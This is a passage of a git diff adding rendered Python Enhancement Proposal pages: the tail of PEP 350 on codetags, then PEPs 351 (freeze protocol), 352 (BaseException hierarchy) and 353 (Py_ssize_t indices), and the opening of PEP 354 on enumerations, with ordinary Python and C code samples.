t:NNNN
Tracker (t) number corresponding to associated Ticket ID in +separate tracking system.
+
+

The following fields are also available but expected to be less +common.

+
+
c:AAAA
Category (c) indicating some specific area affected by this +item.
+
s:AAAA
Status (s) indicating state of item. Examples are “unexplored”, +“understood”, “inprogress”, “fixed”, “done”, “closed”. Note that +when an item is completed it is probably better to remove the +codetag and record it in a DONE File.
+
i:N
Development cycle Iteration (i). Useful for grouping codetags into +completion target groups.
+
r:N
Development cycle Release (r). Useful for grouping codetags into +completion target groups.
+
+

To summarize, the non-prefixed fields are initials and origination +date, and the prefixed fields are: assignee (a), due (d), priority +(p), tracker (t), category (c), status (s), iteration (i), and release +(r).
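To make these conventions concrete, here is a rough sketch, not part of the specification, of how a tool might split a codetag line into mnemonic, commentary, and fields; the regular expression and the helper name parse_fields are illustrative assumptions:

import re

# Matches one single-line codetag comment, e.g.
#   "# FIXME: Seems like this loop should be finite. <MDE d:14w p:2>"
CODETAG_RE = re.compile(
    r'#\s*(?P<mnemonic>[A-Z?!]{3,}):\s*'
    r'(?P<comment>.*?)\s*<(?P<fields>[^>]*)>')

PREFIXES = dict(a='assignee', d='due', p='priority', t='tracker',
                c='category', s='status', i='iteration', r='release')

def parse_fields(field_str):
    """Split '<...>' contents into (non-prefixed tokens, {name: value})."""
    plain, prefixed = [], {}
    for token in field_str.split():
        if len(token) > 1 and token[1] == ':' and token[0] in PREFIXES:
            prefixed[PREFIXES[token[0]]] = token[2:]
        else:
            plain.append(token)  # initials or an origination date/week
    return plain, prefixed

line = "# FIXME: Seems like this loop should be finite. <MDE d:14w p:2>"
m = CODETAG_RE.search(line)
print(m.group('mnemonic'), parse_fields(m.group('fields')))
# -> FIXME (['MDE'], {'due': '14w', 'priority': '2'})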

+

It should be possible for groups to define or add their own fields, +and these should have upper case prefixes to distinguish them from the +standard set. Examples of custom fields are Operating System (O), +Severity (S), Affected Version (A), Customer (C), etc.

+
+
+

DONE File

+

Some codetags have an ability to be completed (e.g., FIXME, +TODO, BUG). It is often important to retain completed items +by recording them with a completion date stamp. Such completed items +are best stored in a single location, global to a project (or maybe a +package). The proposed format is most easily described by an example, +say ~/src/fooproj/DONE:

+
# TODO: Recurse into subdirs only on blue
+# moons. <MDE 2003-09-26>
+[2005-09-26 Oops, I underestimated this one a bit.  Should have
+used Warsaw's First Law!]
+
+# FIXME: ...
+...
+
+
+

You can see that the codetag is copied verbatim from the original +source file. The date stamp is then entered on the following line +with an optional post-mortem commentary. The entry is terminated by a +blank line (\n\n).

+

It may sound burdensome to have to delete codetag lines every time one gets completed. But in practice it is quite easy to set up a Vim or Emacs mapping to auto-record a codetag deletion in this format (sans the commentary).
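The same recording could also be done outside the editor; a small Python helper in the spirit of the format above (the function name and defaults are made up for illustration):

import datetime

def record_done(codetag_lines, done_path='DONE', commentary=''):
    """Append a completed codetag to the DONE file, datestamped,
    terminated by the blank line the format above requires."""
    stamp = datetime.date.today().isoformat()
    with open(done_path, 'a') as done:
        for line in codetag_lines:
            done.write(line.rstrip('\n') + '\n')
        done.write('[%s %s]\n\n' % (stamp, commentary or 'Done.'))

record_done(['# TODO: Recurse into subdirs only on blue',
             '# moons. <MDE 2003-09-26>'],
            commentary='Oops, I underestimated this one a bit.')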

+
+
+
+

Tools

+

Currently, programmers (and sometimes analysts) typically use grep +to generate a list of items corresponding to a single codetag. +However, various hypothetical productivity tools could take advantage +of a consistent codetag format. Some example tools follow.

+
+
Document Generator
Possible docs: glossary, roadmap, manpages
+
Codetag History
Track (with revision control system interface) when a BUG tag +(or any codetag) originated/resolved in a code section
+
Code Statistics
A project Health-O-Meter
+
Codetag Lint
Notify of invalid use of codetags, and aid in porting to codetags
+
Story Manager/Browser
An electronic means to replace XP notecards. In MVC terms, the +codetag is the Model, and the Story Manager could be a graphical +Viewer/Controller to do visual rearrangement, prioritization, and +assignment, milestone management.
+
Any Text Editor
Used for changing, removing, adding, rearranging, recording +codetags.
+
+

There are some tools already in existence that take advantage of a +smaller set of pseudo-codetags (see References). There is also an +example codetags implementation under way, known as the Codetag +Project.
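The grep workflow mentioned above can be approximated in a few lines of Python; this sketch (mnemonic list abbreviated, .py files only) is an illustration, not one of the proposed tools:

import os
import re

TAGS = re.compile(r'#\s*(FIXME|TODO|BUG|HACK|NOTE|XXX)\b')

def scan(root='.'):
    """Print every codetag-looking comment under root, grep-style."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith('.py'):
                continue
            path = os.path.join(dirpath, name)
            with open(path) as src:
                for lineno, line in enumerate(src, 1):
                    if TAGS.search(line):
                        print('%s:%d: %s' % (path, lineno, line.strip()))

scan()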

+
+
+

Objections

+
+
Objection:
+
Extreme Programming argues that such codetags should not +ever exist in code since the code is the documentation.
+
Defense:
+
Maybe you should put the codetags in the unit test files +instead. Besides, it’s tough to generate documentation from +uncommented source code.
+
+
+
+
Objection:
+
Too much existing code has not followed proposed +guidelines.
+
Defense:
+
[Simple] utilities (ctlint) could convert existing code.
+
+
+
+
Objection:
+
Causes duplication with tracking system.
+
Defense:
+
Not really, unless fields are abused. If an item exists in +the tracker, a simple ticket number in the codetag tracker field +is sufficient. Maybe a duplicated title would be acceptable. +Furthermore, it’s too burdensome to have a ticket filed for every +item that pops into a developer’s mind on-the-go. Additionally, +the tracking system could possibly be obviated for simple or small +projects that can reasonably fit the relevant data into a codetag.
+
+
+
+
Objection:
+
Codetags are ugly and clutter code.
+
Defense:
+
That is a good point. But I’d still rather have such info +in a single place (the source code) than various other documents, +likely getting duplicated or forgotten about. The completed +codetags can be sent off to the DONE File, or to the bit +bucket.
+
+
+
+
Objection:
+
Codetags (and all comments) get out of date.
+
Defense:
+
Not so much if other sources (externally visible +documentation) depend on their being accurate.
+
+
+
+
Objection:
+
Codetags tend to only rarely have estimated completion +dates of any sort. OK, the fields are optional, but you want to +suggest fields that actually will be widely used.
+
Defense:
+
If an item is inestimable don’t bother with specifying a +date field. Using tools to display items with order and/or color +by due date and/or priority, it is easier to make estimates. +Having your roadmap be a dynamic reflection of your codetags makes +you much more likely to keep the codetags accurate.
+
+
+
+
Objection:
+
Named variables for the field parameters in the <> +should be used instead of cryptic one-character prefixes. I.e., +<MDE p:3> should rather be <author=MDE, priority=3>.
+
Defense:
+
It is just too much typing/verbosity to spell out fields. I argue that p:3 i:2 is as readable as priority=3, iteration=2 and is much more likely to be typed and remembered (see the third codetag design goal under Philosophy). In this case practicality beats purity. There are not many fields to keep track of so one-letter prefixes are suitable.
+
+
+
+
Objection:
+
Synonyms should be deprecated since it is better to have a +single way to spell something.
+
Defense:
+
Many programmers prefer short mnemonic names, especially in +comments. This is why short mnemonics were chosen as the primary +names. However, others feel that an explicit spelling is less +confusing and less prone to error. There will always be two camps +on this subject. Thus synonyms (and complete, full spellings) +should remain supported.
+
+
+
+
Objection:
+
It is cruel to use [for mnemonics] opaque acronyms and +abbreviations which drop vowels; it’s hard to figure these things +out. On that basis I hate: MLSTN RFCTR RFE FEETCH, NYI, FR, FTRQ, +FTR WKRD RVDBY
+
Defense:
+
Mnemonics are preferred since they are pretty easy to remember and take up less space. If programmers didn’t like dropping vowels we would be able to fit very little code on a line. The space is important for those who write comments that often fit on a single line. But when using canonical full spellings everywhere it is much less likely that a comment will fit on a line.
+
+
+
+
Objection:
+
It takes too long to type the fields.
+
Defense:
+
Then don’t use (most or any of) them, especially if you’re +the only programmer. Terminating a codetag with <> is a small +chore, and in doing so you enable the use of the proposed tools. +Editor auto-completion of codetags is also useful: You can +program your editor to stamp a template (e.g. # FIXME . <MDE +{date}>) with just a keystroke or two.
+
+
+
+
Objection:
+
WorkWeek is an obscure and uncommon time unit.
+
Defense:
+
That’s true but it is a highly suitable unit of granularity +for estimation/targeting purposes, and it is very compact. The +ISO 8601 is widely understood but allows you to only specify +either a specific day (restrictive) or month (broad).
+
+
+
+
Objection:
+
I aesthetically dislike for the comment to be terminated +with <> in the empty field case.
+
Defense:
+
It is necessary to have a terminator since codetags may be +followed by non-codetag comments. Or codetags could be limited to +a single line, but that’s prohibitive. I can’t think of any +single-character terminator that is appropriate and significantly +better than <>. Maybe @ could be a terminator, but then most +codetags will have an unnecessary @.
+
+
+
+
Objection:
+
I can’t use codetags when writing HTML, or less +specifically, XML. Maybe @fields@ would be a better than +<fields> as the delimiters.
+
Defense:
+
Maybe you’re right, but <> looks nicer whenever +applicable. XML/SGML could use @ while more common +programming languages stick to <>.
+
+
+
+

References

+

Some other tools have approached defining/exploiting codetags. +See http://tracos.org/codetag/wiki/Links.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0350.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0351/index.html b/pep-0351/index.html new file mode 100644 index 00000000000..e36487b8193 --- /dev/null +++ b/pep-0351/index.html @@ -0,0 +1,274 @@ + + + + + + + + PEP 351 – The freeze protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 351 – The freeze protocol

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
14-Apr-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a simple protocol for requesting a frozen, +immutable copy of a mutable object. It also defines a new built-in +function which uses this protocol to provide an immutable copy on any +cooperating object.

+
+
+

Rejection Notice

+

This PEP was rejected. For a rationale, see this thread on python-dev.

+
+
+

Rationale

+

Built-in objects such as dictionaries and sets accept only immutable objects as keys. This means that mutable objects like lists cannot be used as keys to a dictionary. However, a Python programmer can convert a list to a tuple; the two objects are similar, but the latter is immutable, and can be used as a dictionary key.

+

It is conceivable that third party objects also have similar mutable +and immutable counterparts, and it would be useful to have a standard +protocol for conversion of such objects.

+

sets.Set objects expose a “protocol for automatic conversion to +immutable” so that you can create sets.Sets of sets.Sets. PEP 218 +deliberately dropped this feature from built-in sets. This PEP +advances that the feature is still useful and proposes a standard +mechanism for its support.

+
+
+

Proposal

+

It is proposed that a new built-in function called freeze() is added.

+

If freeze() is passed an immutable object, as determined by hash() on +that object not raising a TypeError, then the object is returned +directly.

+

If freeze() is passed a mutable object (i.e. hash() of that object +raises a TypeError), then freeze() will call that object’s +__freeze__() method to get an immutable copy. If the object does not +have a __freeze__() method, then a TypeError is raised.

+
+
+

Sample implementations

+

Here is a Python implementation of the freeze() built-in:

+
def freeze(obj):
+    try:
+        hash(obj)
+        return obj
+    except TypeError:
+        freezer = getattr(obj, '__freeze__', None)
+        if freezer:
+            return freezer()
+    raise TypeError('object is not freezable')
+
+
+

Here are some code samples which show the intended semantics:

+
class xset(set):
+    def __freeze__(self):
+        return frozenset(self)
+
+class xlist(list):
+    def __freeze__(self):
+        return tuple(self)
+
+class imdict(dict):
+    def __hash__(self):
+        return id(self)
+
+    def _immutable(self, *args, **kws):
+        raise TypeError('object is immutable')
+
+    __setitem__ = _immutable
+    __delitem__ = _immutable
+    clear       = _immutable
+    update      = _immutable
+    setdefault  = _immutable
+    pop         = _immutable
+    popitem     = _immutable
+
+class xdict(dict):
+    def __freeze__(self):
+        return imdict(self)
+
+>>> s = set([1, 2, 3])
+>>> {s: 4}
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+TypeError: set objects are unhashable
+>>> t = freeze(s)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+  File "/usr/tmp/python-lWCjBK.py", line 9, in freeze
+TypeError: object is not freezable
+>>> t = xset(s)
+>>> u = freeze(t)
+>>> {u: 4}
+{frozenset([1, 2, 3]): 4}
+>>> x = 'hello'
+>>> freeze(x) is x
+True
+>>> d = xdict(a=7, b=8, c=9)
+>>> hash(d)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+TypeError: dict objects are unhashable
+>>> hash(freeze(d))
+-1210776116
+>>> {d: 4}
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+TypeError: dict objects are unhashable
+>>> {freeze(d): 4}
+{{'a': 7, 'c': 9, 'b': 8}: 4}
+
+
+
+
+

Reference implementation

+

Patch 1335812 provides the C implementation of this feature. It adds the +freeze() built-in, along with implementations of the __freeze__() +method for lists and sets. Dictionaries are not easily freezable in +current Python, so an implementation of dict.__freeze__() is not +provided yet.

+
+
+

Open issues

+
  • Should we define a similar protocol for thawing frozen objects?
  • Should dicts and sets automatically freeze their mutable keys?
  • Should we support “temporary freezing” (perhaps with a method called __congeal__()) a la __as_temporarily_immutable__() in sets.Set?
  • For backward compatibility with sets.Set, should we support __as_immutable__()? Or should __freeze__() just be renamed to __as_immutable__()?
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0351.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0352/index.html b/pep-0352/index.html new file mode 100644 index 00000000000..60eadc8314c --- /dev/null +++ b/pep-0352/index.html @@ -0,0 +1,390 @@ + + + + + + + + PEP 352 – Required Superclass for Exceptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 352 – Required Superclass for Exceptions

+
+
Author:
+
Brett Cannon, Guido van Rossum
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Oct-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In Python 2.4 and before, any (classic) class can be raised as an +exception. The plan for 2.5 was to allow new-style classes, but this +makes the problem worse – it would mean any class (or +instance) can be raised! This is a problem as it prevents any +guarantees from being made about the interface of exceptions. +This PEP proposes introducing a new superclass that all raised objects +must inherit from. Imposing the restriction will allow a standard +interface for exceptions to exist that can be relied upon. It also +leads to a known hierarchy for all exceptions to adhere to.

+

One might counter that requiring a specific base class for a +particular interface is unPythonic. However, in the specific case of +exceptions there’s a good reason (which has generally been agreed to +on python-dev): requiring hierarchy helps code that wants to catch +exceptions by making it possible to catch all exceptions explicitly +by writing except BaseException: instead of +except *:. [1]

+

Introducing a new superclass for exceptions also gives us the chance +to rearrange the exception hierarchy slightly for the better. As it +currently stands, all exceptions in the built-in namespace inherit +from Exception. This is a problem since this includes two exceptions +(KeyboardInterrupt and SystemExit) that often need to be excepted from +the application’s exception handling: the default behavior of shutting +the interpreter down without a traceback is usually more desirable than +whatever the application might do (with the possible exception of +applications that emulate Python’s interactive command loop with +>>> prompt). Changing it so that these two exceptions inherit +from the common superclass instead of Exception will make it easy for +people to write except clauses that are not overreaching and not +catch exceptions that should propagate up.

+

This PEP is based on previous work done for PEP 348.

+
+
+

Requiring a Common Superclass

+

This PEP proposes introducing a new exception named BaseException that +is a new-style class and has a single attribute, args. Below +is the code as the exception will work in Python 3.0 (how it will +work in Python 2.x is covered in the Transition Plan section):

+
class BaseException(object):
+
+    """Superclass representing the base of the exception hierarchy.
+
+    Provides an 'args' attribute that contains all arguments passed
+    to the constructor.  Suggested practice, though, is that only a
+    single string argument be passed to the constructor.
+
+    """
+
+    def __init__(self, *args):
+        self.args = args
+
+    def __str__(self):
+        if len(self.args) == 1:
+            return str(self.args[0])
+        else:
+            return str(self.args)
+
+    def __repr__(self):
+        return "%s(*%s)" % (self.__class__.__name__, repr(self.args))
+
+
+

No restriction is placed upon what may be passed in for args +for backwards-compatibility reasons. In practice, though, only +a single string argument should be used. This keeps the string +representation of the exception to be a useful message about the +exception that is human-readable; this is why the __str__ method +special-cases on length-1 args value. Including programmatic +information (e.g., an error code number) should be stored as a +separate attribute in a subclass.

+

The raise statement will be changed to require that any object +passed to it must inherit from BaseException. This will make sure +that all exceptions fall within a single hierarchy that is anchored at +BaseException [1]. This also guarantees a basic +interface that is inherited from BaseException. The change to +raise will be enforced starting in Python 3.0 (see the Transition +Plan below).

+

With BaseException being the root of the exception hierarchy, +Exception will now inherit from it.

+
+
+

Exception Hierarchy Changes

+

With the exception hierarchy now even more important since it has a basic root, a change to the existing hierarchy is called for. As it stands now, if one wants to catch all exceptions that signal an error and do not mean the interpreter should be allowed to exit, one must specify all but two exceptions explicitly in an except clause, or catch the two exceptions separately, re-raise them, and have all other exceptions fall through to a bare except clause:

+
except (KeyboardInterrupt, SystemExit):
+    raise
+except:
+    ...
+
+
+

That is needlessly explicit. This PEP proposes moving +KeyboardInterrupt and SystemExit to inherit directly from +BaseException.

+
- BaseException
+  |- KeyboardInterrupt
+  |- SystemExit
+  |- Exception
+     |- (all other current built-in exceptions)
+
+
+

Doing this makes catching Exception more reasonable. It would catch +only exceptions that signify errors. Exceptions that signal that the +interpreter should exit will not be caught and thus be allowed to +propagate up and allow the interpreter to terminate.
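A minimal sketch of the resulting idiom (main() and log_failure() are placeholder names, not part of the PEP):

def main():
    raise ValueError('simulated application error')

def log_failure():
    print('error handled; interpreter keeps running')

try:
    main()
except Exception:
    # KeyboardInterrupt and SystemExit no longer inherit from Exception,
    # so they skip this handler and propagate up, letting the interpreter
    # terminate as requested.
    log_failure()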

+

KeyboardInterrupt has been moved since users typically expect an +application to exit when they press the interrupt key (usually Ctrl-C). +If people have overly broad except clauses the expected behaviour +does not occur.

+

SystemExit has been moved for similar reasons. Since the exception is +raised when sys.exit() is called the interpreter should normally +be allowed to terminate. Unfortunately overly broad except +clauses can prevent the explicitly requested exit from occurring.

+

To make sure that people catch Exception most of the time, various +parts of the documentation and tutorials will need to be updated to +strongly suggest that Exception be what programmers want to use. Bare +except clauses or catching BaseException directly should be +discouraged based on the fact that KeyboardInterrupt and SystemExit +almost always should be allowed to propagate up.

+
+
+

Transition Plan

+

Since semantic changes to Python are being proposed, a transition plan +is needed. The goal is to end up with the new semantics being used in +Python 3.0 while providing a smooth transition for 2.x code. All +deprecations mentioned in the plan will lead to the removal of the +semantics starting in the version following the initial deprecation.

+

Here is BaseException as implemented in the 2.x series:

+
import warnings  # needed by the deprecated 'message' property below

class BaseException(object):
+
+    """Superclass representing the base of the exception hierarchy.
+
+    The __getitem__ method is provided for backwards-compatibility
+    and will be deprecated at some point.  The 'message' attribute
+    is also deprecated.
+
+    """
+
+    def __init__(self, *args):
+        self.args = args
+
+    def __str__(self):
+        return str(self.args[0]
+                   if len(self.args) == 1
+                   else self.args)
+
+    def __repr__(self):
+        func_args = repr(self.args) if self.args else "()"
+        return self.__class__.__name__ + func_args
+
+    def __getitem__(self, index):
+        """Index into arguments passed in during instantiation.
+
+        Provided for backwards-compatibility and will be
+        deprecated.
+
+        """
+        return self.args[index]
+
+    def _get_message(self):
+        """Method for 'message' property."""
+        warnings.warn("the 'message' attribute has been deprecated "
+                        "since Python 2.6")
+        return self.args[0] if len(self.args) == 1 else ''
+
+    message = property(_get_message,
+                        doc="access the 'message' attribute; "
+                            "deprecated and provided only for "
+                            "backwards-compatibility")
+
+
+

Deprecation of features in Python 2.9 is optional. This is because it +is not known at this time if Python 2.9 (which is slated to be the +last version in the 2.x series) will actively deprecate features that +will not be in 3.0. It is conceivable that no deprecation warnings +will be used in 2.9 since there could be such a difference between 2.9 +and 3.0 that it would make 2.9 too “noisy” in terms of warnings. Thus +the proposed deprecation warnings for Python 2.9 will be revisited +when development of that version begins, to determine if they are still +desired.

+
  • Python 2.5 [done]
    • all standard exceptions become new-style classes [done]
    • introduce BaseException [done]
    • Exception, KeyboardInterrupt, and SystemExit inherit from BaseException [done]
    • deprecate raising string exceptions [done]
  • Python 2.6 [done]
    • deprecate catching string exceptions [done]
    • deprecate message attribute (see Retracted Ideas) [done]
  • Python 2.7 [done]
    • deprecate raising exceptions that do not inherit from BaseException
  • Python 3.0 [done]
    • drop everything that was deprecated above:
      • string exceptions (both raising and catching) [done]
      • all exceptions must inherit from BaseException [done]
      • drop __getitem__, message [done]
+
+
+

Retracted Ideas

+

A previous version of this PEP that was implemented in Python 2.5 +included a ‘message’ attribute on BaseException. Its purpose was to +begin a transition to BaseException accepting only a single argument. +This was to tighten the interface and to force people to use +attributes in subclasses to carry arbitrary information with an +exception instead of cramming it all into args.

+

Unfortunately, while implementing the removal of the args +attribute in Python 3.0 at the PyCon 2007 sprint +[2], it was discovered that the transition was +very painful, especially for C extension modules. It was decided that +it would be better to deprecate the message attribute in +Python 2.6 (and remove it in Python 2.7 and Python 3.0) and consider a +more long-term transition strategy in Python 3.0 to remove +multiple-argument support in BaseException in preference of accepting +only a single argument. Thus the introduction of message and the +original deprecation of args has been retracted.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0352.rst

+

Last modified: 2024-12-03 18:09:24 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0353/index.html b/pep-0353/index.html new file mode 100644 index 00000000000..031e6094f17 --- /dev/null +++ b/pep-0353/index.html @@ -0,0 +1,368 @@ + + + + + + + + PEP 353 – Using ssize_t as the index type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 353 – Using ssize_t as the index type

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Dec-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In Python 2.4, indices of sequences are restricted to the C type +int. On 64-bit machines, sequences therefore cannot use the full +address space, and are restricted to 2**31 elements. This PEP proposes +to change this, introducing a platform-specific index type +Py_ssize_t. An implementation of the proposed change is in +http://svn.python.org/projects/python/branches/ssize_t.

+
+
+

Rationale

+

64-bit machines are becoming more popular, and the size of main memory increases beyond 4GiB. On such machines, Python currently is limited, in that sequences (strings, unicode objects, tuples, lists, array.arrays, …) cannot contain more than 2**31 elements.
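On an interpreter that includes this change, the platform index width is easy to observe; sys.maxsize (added in Python 2.6, after this PEP landed in 2.5) exposes the value of PY_SSIZE_T_MAX:

import sys

# Prints 2**63 - 1 (9223372036854775807) on a 64-bit build; under the
# old int-indexed model the effective limit was 2**31 - 1.
print(sys.maxsize)
print(sys.maxsize > 2**31)   # True on 64-bit platforms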

+

Today, very few machines have memory to represent larger lists: as +each pointer is 8B (in a 64-bit machine), one needs 16GiB to just hold +the pointers of such a list; with data in the list, the memory +consumption grows even more. However, there are three container types +for which users request improvements today:

+
  • strings (currently restricted to 2GiB)
  • mmap objects (likewise; plus the system typically won’t keep the whole object in memory concurrently)
  • Numarray objects (from Numerical Python)
+

As the proposed change will cause incompatibilities on 64-bit +machines, it should be carried out while such machines are not in wide +use (IOW, as early as possible).

+
+
+

Specification

+

A new type Py_ssize_t is introduced, which has the same size as the +compiler’s size_t type, but is signed. It will be a typedef for +ssize_t where available.

+

The internal representation of the length fields of all container +types is changed from int to ssize_t, for all types included in the +standard distribution. In particular, PyObject_VAR_HEAD is changed to +use Py_ssize_t, affecting all extension modules that use that macro.

+

All occurrences of index and length parameters and results are changed +to use Py_ssize_t, including the sequence slots in type objects, and +the buffer interface.

+

New conversion functions PyInt_FromSsize_t and PyInt_AsSsize_t, are +introduced. PyInt_FromSsize_t will transparently return a long int +object if the value exceeds the LONG_MAX; PyInt_AsSsize_t will +transparently process long int objects.

+

New function pointer typedefs ssizeargfunc, ssizessizeargfunc, +ssizeobjargproc, ssizessizeobjargproc, and lenfunc are introduced. The +buffer interface function types are now called readbufferproc, +writebufferproc, segcountproc, and charbufferproc.

+

A new conversion code ‘n’ is introduced for PyArg_ParseTuple +Py_BuildValue, PyObject_CallFunction and PyObject_CallMethod. +This code operates on Py_ssize_t.

+

The conversion codes ‘s#’ and ‘t#’ will output Py_ssize_t +if the macro PY_SSIZE_T_CLEAN is defined before Python.h +is included, and continue to output int if that macro +isn’t defined.

+

At places where a conversion from size_t/Py_ssize_t to +int is necessary, the strategy for conversion is chosen +on a case-by-case basis (see next section).

+

To prevent loading extension modules that assume a 32-bit +size type into an interpreter that has a 64-bit size type, +Py_InitModule4 is renamed to Py_InitModule4_64.

+
+
+

Conversion guidelines

+

Module authors have the choice whether they support this PEP in their +code or not; if they support it, they have the choice of different +levels of compatibility.

+

If a module is not converted to support this PEP, it will continue to +work unmodified on a 32-bit system. On a 64-bit system, compile-time +errors and warnings might be issued, and the module might crash the +interpreter if the warnings are ignored.

+

Conversion of a module can either attempt to continue using int +indices, or use Py_ssize_t indices throughout.

+

If the module should continue to use int indices, care must be taken +when calling functions that return Py_ssize_t or size_t, in +particular, for functions that return the length of an object (this +includes the strlen function and the sizeof operator). A good compiler +will warn when a Py_ssize_t/size_t value is truncated into an int. +In these cases, three strategies are available:

+
  • statically determine that the size can never exceed an int (e.g. when taking the sizeof a struct, or the strlen of a file pathname). In this case, write:

    some_int = Py_SAFE_DOWNCAST(some_value, Py_ssize_t, int);

    This will add an assertion in debug mode that the value really fits into an int, and just add a cast otherwise.

  • statically determine that the value shouldn’t overflow an int unless there is a bug in the C code somewhere. Test whether the value is smaller than INT_MAX, and raise an InternalError if it isn’t.
  • otherwise, check whether the value fits an int, and raise a ValueError if it doesn’t.
+

The same care must be taken for tp_as_sequence slots, in +addition, the signatures of these slots change, and the +slots must be explicitly recast (e.g. from intargfunc +to ssizeargfunc). Compatibility with previous Python +versions can be achieved with the test:

+
#if PY_VERSION_HEX < 0x02050000 && !defined(PY_SSIZE_T_MIN)
+typedef int Py_ssize_t;
+#define PY_SSIZE_T_MAX INT_MAX
+#define PY_SSIZE_T_MIN INT_MIN
+#endif
+
+
+

and then using Py_ssize_t in the rest of the code. For +the tp_as_sequence slots, additional typedefs might +be necessary; alternatively, by replacing:

+
PyObject* foo_item(struct MyType* obj, int index)
+{
+  ...
+}
+
+
+

with:

+
PyObject* foo_item(PyObject* _obj, Py_ssize_t index)
+{
+   struct MyType* obj = (struct MyType*)_obj;
+   ...
+}
+
+
+

it becomes possible to drop the cast entirely; the type +of foo_item should then match the sq_item slot in all +Python versions.

+

If the module should be extended to use Py_ssize_t indices, all usages +of the type int should be reviewed, to see whether it should be +changed to Py_ssize_t. The compiler will help in finding the spots, +but a manual review is still necessary.

+

Particular care must be taken for PyArg_ParseTuple calls: +they need all be checked for s# and t# converters, and +PY_SSIZE_T_CLEAN must be defined before including Python.h +if the calls have been updated accordingly.

+

Fredrik Lundh has written a scanner which checks the code +of a C module for usage of APIs whose signature has changed.

+
+
+

Discussion

+
+

Why not size_t

+

An initial attempt to implement this feature tried to use size_t. It quickly turned out that this cannot work: Python uses negative indices in many places (to indicate counting from the end). Even in places where size_t would be usable, too many reformulations of code were necessary, e.g. in loops like:

+
for(index = length-1; index >= 0; index--)
+
+
+

This loop will never terminate if index is changed from +int to size_t.

+
+
+

Why not Py_intptr_t

+

Conceptually, Py_intptr_t and Py_ssize_t are different things: +Py_intptr_t needs to be the same size as void*, and Py_ssize_t +the same size as size_t. These could differ, e.g. on machines +where pointers have segment and offset. On current flat-address +space machines, there is no difference, so for all practical +purposes, Py_intptr_t would have worked as well.

+
+
+

Doesn’t this break much code?

+

With the changes proposed, code breakage is fairly +minimal. On a 32-bit system, no code will break, as +Py_ssize_t is just a typedef for int.

+

On a 64-bit system, the compiler will warn in many places. If these warnings are ignored, the code will continue to work as long as the container sizes don’t exceed 2**31, i.e. it will work nearly as well as it does currently. There are two exceptions to this statement: if the extension module implements the sequence protocol, it must be updated, or the calling conventions will be wrong. The other exception is the places where Py_ssize_t is output through a pointer (rather than a return value); this applies most notably to codecs and slice objects.

+

If the conversion of the code is made, the same code +can continue to work on earlier Python releases.

+
+
+

Doesn’t this consume too much memory?

+

One might think that using Py_ssize_t in all tuples, +strings, lists, etc. is a waste of space. This is +not true, though: on a 32-bit machine, there is no +change. On a 64-bit machine, the size of many +containers doesn’t change, e.g.

+
  • in lists and tuples, a pointer immediately follows the ob_size member. This means that the compiler currently inserts 4 padding bytes; with the change, these padding bytes become part of the size.
  • in strings, the ob_shash field follows ob_size. This field is of type long, which is a 64-bit type on most 64-bit systems (except Win64), so the compiler inserts padding before it as well.
+
+
+
+

Open Issues

+
  • Marc-Andre Lemburg commented that complete backwards compatibility with existing source code should be preserved. In particular, functions that have Py_ssize_t* output arguments should continue to run correctly even if the callers pass int*.

    It is not clear what strategy could be used to implement that requirement.
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0353.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0354/index.html b/pep-0354/index.html new file mode 100644 index 00000000000..16def600a40 --- /dev/null +++ b/pep-0354/index.html @@ -0,0 +1,363 @@ + + + + + + + + PEP 354 – Enumerations in Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 354 – Enumerations in Python

+
+
Author:
+
Ben Finney <ben+python at benfinney.id.au>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
20-Dec-2005
+
Python-Version:
+
2.6
+
Post-History:
+
20-Dec-2005
+
Superseded-By:
+
435
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. This doesn’t slot nicely into any of the +existing modules (like collections), and the Python standard library +eschews having lots of individual data structures in their own +modules. Also, the PEP has generated no widespread interest. For +those who need enumerations, there are cookbook recipes and PyPI +packages that meet these needs.

+

Note: this PEP was superseded by PEP 435, which has been accepted in +May 2013.

+
+
+

Abstract

+

This PEP specifies an enumeration data type for Python.

+

